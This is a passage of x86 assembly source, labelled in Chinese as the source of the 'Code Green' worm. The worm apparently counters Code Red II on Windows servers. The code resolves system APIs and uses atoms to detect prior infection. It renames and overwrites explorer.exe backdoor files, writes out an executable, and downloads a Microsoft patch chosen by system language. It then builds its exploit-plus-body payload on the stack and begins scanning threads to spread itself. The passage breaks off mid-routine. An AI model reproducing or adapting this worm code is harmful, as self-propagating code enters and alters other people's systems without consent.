codegreen.asm

蠕虫—绿色代码的源程序

		add edi, 4

	_GetProcAddy_LoadLibrary:
		pushad
			lea eax, [ebp][Str_LoadLibrary]
				push eax
				push esi
			call edx
			mov [esp+24], eax	;ECX: LoadLibrary
		popad
		mov [ebp][ProcTable+API_LoadLibrary], ecx

	_LoadUsedLibraries:
		pushad
			lea esi, [ebp][Str_Advapi]
				push esi
			call ecx ;LoadLibrary
			mov [edi], eax
		popad
		add edi, 4

		pushad
			lea esi, [ebp][Str_User]
				push esi
			call ecx ;LoadLibrary
			mov [edi], eax
		popad
		add edi, 4

		pushad
			lea esi, [ebp][Str_WSock]
				push esi
			call ecx ;LoadLibrary
			mov [edi], eax
		popad
		add edi, 4

		pushad
			lea esi, [ebp][Str_WinInet]
				push esi
			call ecx ;LoadLibrary
			mov [edi], eax
		popad

	pop esi ;esi -> DllTable
		lea ebx, [ebp][ProcTable+8]
		lea edi, [ebp][ProcNameTable]
	_LoadUsedFunctions:
		pushad
			push edi ;ProcName
			push [esi]
			call edx ;GetProcAddy
			mov [ebx], eax
		popad
		add ebx, 4

		SearchNextFunctionName:
			xor al, al
			xor ecx, ecx
			dec ecx
			repne scasb
			cmp al, byte ptr [edi] ;[edi](byte)=0?
			jne _LoadUsedFunctions

		SearchNextDll:
			add esi, 4
			inc edi
			cmp al, byte ptr [edi]
			je AllFunctionsLoaded
		jmp _LoadUsedFunctions

		AllFunctionsLoaded:

	_CheckIfCodeGreenIsAlreadyExecuted:

		CheckIfCodeGreenAtomIsPresent:
			lea ebx, [ebp][CGAtom]
				push ebx
			call [ebp][ProcTable+API_FindAtom]

			or ax, ax
			jz DumpCodeGreenAtom

			TerminateCodeGreenExecution:
					push 2678400000 ;31 days
				call [ebp][ProcTable+API_Sleep]
			jmp TerminateCodeGreenExecution

		DumpCodeGreenAtom:
				push ebx
			call [ebp][ProcTable+API_AddAtom]

	_ReserveMemory:
		push PAGE_EXECUTE_READWRITE
		push MEM_COMMIT
		push 00070000h ;ca. 450kb
		push NULL
		call [ebp][ProcTable+API_VirtualAlloc]
		mov esi, eax					;ESI: AllocatedMem
		mov [ebp][MemPointer], eax
	;**********************************************************************************
	;*** anti Code Red II                                                           ***
	;**********************************************************************************

	_AntiCodeRedII:
		_CheckIfCodeRedIIAtomIsPresent:
			lea ebx, [ebp][CRIIAtom]
				push ebx
			call [ebp][ProcTable+API_GlobalFindAtom]
			or ax, ax
		jnz _RelaceExistingExplorerBackdoor

		DumpCodeRedIIAtom:
				push ebx
			call [ebp][ProcTable+API_GlobalAddAtom]

		_RelaceExistingExplorerBackdoor:

			mov bl, "B"
			mov bh, 2
			lea esi, [ebp][OldExplorer]
			lea edi, [ebp][NewExplorer]

			_MoveExplorerTo_xplorerLoop:
			inc bl

				mov [esi], byte ptr bl
				mov [edi], byte ptr bl
					push FILE_ATTRIBUTE_NORMAL
					push esi
				call [ebp][ProcTable+API_SetFileAttributes]
					;push MOVEFILE_REPLACE_EXISTING
					push edi
					push esi
				call [ebp][ProcTable+API_MoveFile]
			dec bh
			or bh, bh

			jnz _MoveExplorerTo_xplorerLoop

		_BuildAntiCodeRedExe:
			mov edi, [ebp][MemPointer]
			cld

				lea esi, [ebp][eExeContent1]
				mov ecx, offset eExeContent2 - offset eExeContent1 -4
			rep movsb
			add edi, [esi] ;dword ptr [eExeContent2-4]

				lea esi, [ebp][eExeContent2]
				mov ecx, offset eExeContent3 - offset eExeContent2 -4
			rep movsb
			add edi, [esi] ;dword ptr [eExeContent3-4]

				lea esi, [ebp][eExeContent3]
				mov ecx, offset eExeContent4 - offset eExeContent3 -4
			rep movsb
			add edi, [esi] ;dword ptr [eExeContent4-4]

				lea esi, [ebp][eExeContent4]
				mov ecx, offset eExeContent5 - offset eExeContent4 -4
			rep movsb
			add edi, [esi] ;dword ptr [eExeContent5-4]

			mov ebx, edi
			mov edi, [ebp][MemPointer]		;EDI -> AntiCodeRedBuffer
			sub ebx, edi				;EBX: LenAntiCodeRed

		_SaveAntiCodeRedExe:
			mov cl, "B"
			mov ch, 2
			lea esi, [ebp][OldExplorer]

			_SaveAntiCodeRedLoop:
				inc cl
				mov [esi], byte ptr cl
				push ecx

					CreateAntiExplorer:
							push 0
							push FILE_ATTRIBUTE_NORMAL
							push CREATE_ALWAYS
							push 0
							push 0
							push GENERIC_READ or GENERIC_WRITE
							push esi
						call [ebp][ProcTable+API_CreateFile]

					WriteAntExplorer:
						push eax
							push 0
								mov edx, esp
									push 0		;lpOverlapped
									push edx	;lpNrOfBytesWritten
									push ebx	;dwNrOfBytes2Write
									push edi	;lpBuffer
									push eax	;hFile
								call [ebp][ProcTable+API_WriteFile]	;WriteFile
							pop eax
						pop eax

					CloseAntiExplorerHandle:
							push eax
						call [ebp][ProcTable+API_CloseHandle]

				pop ecx
				dec ch
				or ch, ch
			jnz _SaveAntiCodeRedLoop

	;**********************************************************************************
	;***  download patch                                                            ***
	;**********************************************************************************

	mov esi, [ebp][MemPointer]

	_DetermineSystemLanguage:
		call [ebp][ProcTable+API_GetSystemDefaultLangID]	;407h = german
		mov bh, al					;BH: LangID
		or bh, bh
		jz LangIDNotBetween1And31
		cmp bh, 31
		jg LangIDNotBetween1And31
		IsChinese:
			cmp al, 4 ;chinese
			jne NotChinese
			cmp ah, 2
			jne NotChineseSimplified
			mov bh, 3 ;ChineseSimplified [3]
			jmp SystemLanguageDetermined

		NotChinese:
		 NotChineseSimplified:
			cmp al, LANG_PORTUGUESE ;16h
			jne NotPortuguese
			cmp ah, SUBLANG_PORTUGUESE_BRAZILIAN ;01h
			jne NotPortugueseBrazilian
			mov bh, 23 ;Brazilian [23]
			;jmp SystemLanguageDetermined

		NotPortuguese:
		 NotPortugueseBrazilian:
			jmp SystemLanguageDetermined

		LangIDNotBetween1And31:
			mov bh, 9 ;uses ENGLISH as default language
			;jmp SystemLanguageDetermined

		SystemLanguageDetermined:

	_BuildDownloadUrl:
		push esi	;ptrBufMem
			xchg esi, edi					;EDI -> BufMem
			xor ecx, ecx
			xor eax, eax
			dec ecx
				;if an exploit for NT4 came out, we might need this:
				;	cmp bl, 4
				;	jne OS_NT5 ;GetTablePosByLangID
				;	OS_NT4:
				;		NT4_CopyFirstPartOfUrl:
				;			lea esi, [ebp][DLUrlNT4]
				;			call DetermineStringLength
				;			rep movsb
				;		NT4_AddUrlTableEntry:
				;			lea esi, [ebp][NT4UrlTable]		;ESI -> NT[OS-Version]UrlTable
				;			call FindUrlTableEntry
				;			cmp [esi], byte ptr 0
				;			jne NT4_ValidEntryInTableFound
				;			NT4_NoValidEntryInTable:
				;				mov bh, 9
				;				mov [ebp][DLError], byte ptr 1
				;				jmp NT4_AddUrlTableEntry
				;			NT4_ValidEntryInTableFound:
				;				call DetermineStringLength
				;				rep movsb
				;		NT4_AddFileName:
				;			lea esi, [ebp][DLUrlNT4_2]
				;			call DetermineStringLength
				;			inc ecx ;add zero at the end
				;			rep movsb
				;	jmp DownloadUrlBuilt
			OS_NT5:
				NT5_CopyFirstPartOfUrl:			;"http://a"
					lea esi, [ebp][DLUrlNT5]
					call DetermineStringLength

					rep movsb
				NT5_FindUrlTableEntry:
					lea esi, [ebp][NT5UrlTable]		;ESI -> NT[OS-Version]UrlTable
					call FindUrlTableEntry
					cmp [esi], byte ptr 0
					jne NT5_ValidEntryInTableFound
					NT5_NoValidEntryInTable:
						mov bh, 9
						mov [ebp][DLError], byte ptr 1
						jmp NT5_FindUrlTableEntry
					NT5_ValidEntryInTableFound:	;esi -> TableEntry
				NT5_AddUrlTableEntry:			;"131"
					mov eax, dword ptr [esi]
					stosd
					dec edi
				push esi ;->TableEntry
				NT5_AddPart_2:				;".ms.a.microsoft.com/f/"
					lea esi, [ebp][DLUrlNT5_2]
					call DetermineStringLength
					rep movsb
				NT5_AddUrlTableEntry_2:			;"131"
					stosd
					dec edi
				NT5_AddPart_3:				;"/1611/2h/download.microsoft.com/download/win2000platform/Patch/q300972/NT5/"
					inc esi
					call DetermineStringLength
					rep movsb
				NT5_AddUrlTableEntry_3:			;"EN-US"
				pop esi
					add esi, 3
				push esi
					call DetermineStringLength
					rep movsb
				NT5_AddPart_4:				;"Q300972_W2K_SP3_x86_"
					lea esi, [ebp][DLUrlNT5_4]
					call DetermineStringLength
					rep movsb
				NT5_AddFileName:			;"en"
				pop esi
					mov ax, word ptr [esi]
					cmp bh, 23 ;Brazilian
					jne NT5_UseFirstTwoBytes ;NotPortugueseBrazilian
					NT5_UseLastTwoBytes:
						mov ax, word ptr [esi+3]
					NT5_UseFirstTwoBytes:
					stosw
				NT5_AddFileExtension:
					mov eax, "EXE."
					stosd
					mov [edi], byte ptr 0

		DownloadUrlBuilt:
		pop esi	;esi -> UrlString

	_DownloadPatchFile:
			push 0		;dwFlags
			push INTERNET_INVALID_PORT_NUMBER ;dwPort [0]
			push NULL	;lpProxyName
			push PRE_CONFIG_INTERNET_ACCESS ;dwAccessType
		lea eax, [ebp][Net_BrowserName]
			push eax	;lpCallerName
		call [ebp][ProcTable+API_NetOpen]		;InternetOpenA
		mov ebx, eax	;EBX: hNet

			push 0		;dwContext
			push INTERNET_FLAG_RELOAD ;dwFlags
			push 0		;dwHeadersLength
			push NULL	;lpHeaders
			push esi	;lpUrl
			push ebx	;hNet
		call [ebp][ProcTable+API_NetOpenUrl]		;InternatOpenUrlA
		or eax, eax
		jz DownloadPatchFile_ERROR
		mov edi, eax	;EDI: hUrlFile

		lea eax, [ebp][LenPatchFile]
			push eax	;lpNrOfBytesRead
			push 00070000h	;dwNrOfBytes2Read
			push esi	;lpBuffer
			push edi	;hUrlFile
		call [ebp][ProcTable+API_NetReadFile]		;InternetReadFile
		or eax, eax
		jz DownloadPatchFile_ERROR
		cmp [ebp][LenPatchFile], dword ptr 0
		je DownloadPatchFile_ERROR

		jmp CloseInternetHandles

		DownloadPatchFile_ERROR:
			mov [ebp][DLError], byte ptr 2

		CloseInternetHandles:
			push edi
		call [ebp][ProcTable+API_NetCloseHandle]	;InternetCloseHandle

			push ebx
		call [ebp][ProcTable+API_NetCloseHandle]

	;**********************************************************************************
	;***  propagation                                                               ***
	;**********************************************************************************

	_BuildCodeGreen:

		lea esi, [ebp][CodeGreenExploit]
		mov eax, CGExploitLen + CGLen
		mov ecx, eax
		shr ecx, 2 ;div 4
		inc ecx
		mov ebx, ecx	;ebx: NrOfPushs
		ReserveStackLoop:
			push 090909090h
			loop ReserveStackLoop
			push ebx	;first DW in stack-field holds NrOfPushs

			mov [ebp][ptrNewCodeGreen], esp

		CopyCodeGreenExploit:
			mov ecx, CGExploitLen ;eax
			lea edi, [esp+4]
			rep movsb

		AddCodeGreenCode:
			lea esi, [ebp][_CGEntry]
			mov ecx, CGLen
			rep movsb

	_StartPropagation:
		mov [ebp][NrOfThreads], word ptr 0
		mov [ebp][EndThreadsFlag], byte ptr 0
		mov [ebp][CurrentIP], dword ptr 0

		Main_StartRandomGenerator:
			push 0
				push esp	;lpThreadId